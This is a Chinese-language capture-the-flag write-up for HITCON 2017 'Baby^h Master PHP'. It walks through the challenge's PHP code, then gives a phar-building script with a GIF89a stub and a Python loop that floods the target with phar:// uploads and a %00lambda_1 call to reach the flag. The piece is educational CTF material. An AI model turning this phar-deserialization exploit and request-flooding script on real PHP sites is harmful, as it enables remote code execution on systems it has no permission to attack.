[HITCON 2017]Baby^h Master PHP

[HITCON 2017]Baby^h Master PHP

考点

• 代码审计

• create_function生成的匿名函数特性

• phar反序列化

wp

第一段：初始条件

看一下初始的条件

$FLAG = create_function("", 'die(`/read_flag`);'); 
$SECRET = `/read_secret`;
$SANDBOX = "/var/www/data/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
@mkdir($SANDBOX);
@chdir($SANDBOX);

首先回顾一下create_function是啥

create_function('$a','echo $a;')等价于创建一个匿名函数，它的名字是\x00lambda_%d

eval(
function __lambda_func($a){
	echo $a; 
}
)

第一行等同于

eval(
function __lambda_func(){
	die(`/read_flag`);
}
)

这个初始过程是：获取FLAG，获取密钥，生成沙盒

防止在公共靶机下出现啥bug

第二段：输入

看一下输入在哪儿

$mode = $_GET["m"];
if ($mode == "upload") {
    upload(check_session());
} else if ($mode == "show") {
    show(check_session());
} else {
    echo "IP:".$_SERVER["REMOTE_ADDR"];
    echo "Sandbox:"."/var/www/data/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    highlight_file(__FILE__);
}

有三种模式，upload、show以及其它

第三段：upload模式

无论哪个模式都会执行check_session函数，那就看一下

function check_session() {
    global $SECRET;
    $data = $_COOKIE["session-data"];
    list($data, $hmac) = explode("-----", $data, 2);
    if (!isset($data, $hmac) || !is_string($data) || !is_string($hmac)) {
        die("Bye");
    }

    if (!hash_equals(hash_hmac("sha1", $data, $SECRET), $hmac)) {
        die("Bye Bye");
    }

    $data = unserialize($data);
    if (!isset($data->avatar)) {
        die("Bye Bye Bye");
    }

    return $data->avatar;
}

先获取cookie中的session-data，我这里是O%3A4%3A%22User%22%3A1%3A%7Bs%3A6%3A%22avatar%22%3Bs%3A46%3A%22%2Fvar%2Fwww%2Fdata%2F0f3cd5989359bdd5a04508bf19418e31%22%3B%7D-----73dcb35650323907c141d8988a5d0d962396fbbe

那它怎么来的呢，可以看到，data是User类序列化的内容，而hmac是hash_hmac("sha1", $data, $SECRET)的结果

if (!isset($_COOKIE["session-data"])) {
    $data = serialize(new User($SANDBOX));
    $hmac = hash_hmac("sha1", $data, $SECRET);
    setcookie("session-data", sprintf("%s-----%s", $data, $hmac));
}
class User {
    public $avatar;
    function __construct($path) {
        $this->avatar = $path;
    }
}

然后将cookie进行分割，还原出data和hmac。并对data和hmac再做一次校验，验证hmac是否由hash_hmac("sha1", $data, $SECRET)生成。是的话对data进行反序列化，然后返回它的avatar属性。

upload模式下，还会再去执行upload()函数，这里的path参数就是自己的沙盒地址

function upload($path) {
    $data = file_get_contents($_GET["url"] . "/avatar.gif");
    if (substr($data, 0, 6) !== "GIF89a") {
        die("Fuck off");
    }

    file_put_contents($path . "/avatar.gif", $data);
    die("Upload OK");
}

然后从外部获取url下的avatar.gif，覆盖掉沙盒的那个avatar.gif

第四段：show模式

show模式下，在check_session()获取沙盒地址后，判断这个地址下的avatar.gif存不存在，存在的话就返回这个avatar.gif

function show($path) {
    if (!file_exists($path . "/avatar.gif")) {
        $path = "/var/www/html";
    }

    header("Content-Type: image/gif");
    die(file_get_contents($path . "/avatar.gif"));
}

第五段：查漏

整体看完了，发现Admin类好像没有用到，这里大概就是最终要利用的地方

class Admin extends User {
    function __destruct() {
        $random = bin2hex(openssl_random_pseudo_bytes(32));
        eval("function my_function_$random() {"
            . "  global \$FLAG; \$FLAG();"
            . "}");
        $_GET["lucky"]();
    }
}

__destruct里面定义一个随机函数，执行这个随机函数可以获取flag，但是直接执行初始的匿名函数就可以了

思路

很明显的phar反序列化，生成Admin类的phar文件，通过upload函数触发phar反序列化，然后执行匿名函数

<?php
class Admin{
	public $avatar='xyz';
}
$a = new Admin();

$phar = new Phar('123.phar',0,'123.phar');
$phar->startBuffering();
$phar->setStub('GIF89a<?php __HALT_COMPILER(); ?>');


$phar->setMetadata($a);
$phar->addFromString('text.txt','test');
$phar->stopBuffering();

最后一段引用官方wp原文

但是我们并不能知道当前的匿名函数到底有多少个, 因为每访问一次题目就会生成一个匿名函数; 最后就引出了最后一个考点, Apache-prefork模型(默认模型)在接受请求后会如何处理,首先Apache会默认生成5个child server去等待用户连接, 默认最高可生成256个child server, 这时候如果用户大量请求, Apache就会在处理完MaxRequestsPerChild个tcp连接后kill掉这个进程,开启一个新进程处理请求(这里猜测Orange大大应该修改了默认的0,因为0为永不kill掉子进程 这样就无法fork出新进程了) 在这个新进程里面匿名函数就会是从1开始的了

1. 生成phar放在自己的服务器上

2. 上传文件?c=upload&url=http://ip

3. 写个脚本一直请求?m=upload&url=phar:///var/www/data/***&lucky=%00lambda_1

import requests

url = 'http://12c6a169-a23b-4d57-bb1c-b16d6513f0ba.node3.buuoj.cn/?m=upload&url=phar:///var/www/data/0f3cd5989359bdd5a04508bf19418e31&lucky=%00lambda_1'

header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0',
    'Cookie': 'UM_distinctid=1773491acc0ff-0d74662bd23926-12666d4a-144000-1773491acc126b; session-data=O%3A4%3A%22User%22%3A1%3A%7Bs%3A6%3A%22avatar%22%3Bs%3A46%3A%22%2Fvar%2Fwww%2Fdata%2F0f3cd5989359bdd5a04508bf19418e31%22%3B%7D-----73dcb35650323907c141d8988a5d0d962396fbbe'
}
while True:
    r =requests.get(url,headers=header)
    if 'flag' in r.text:
        print(r.text)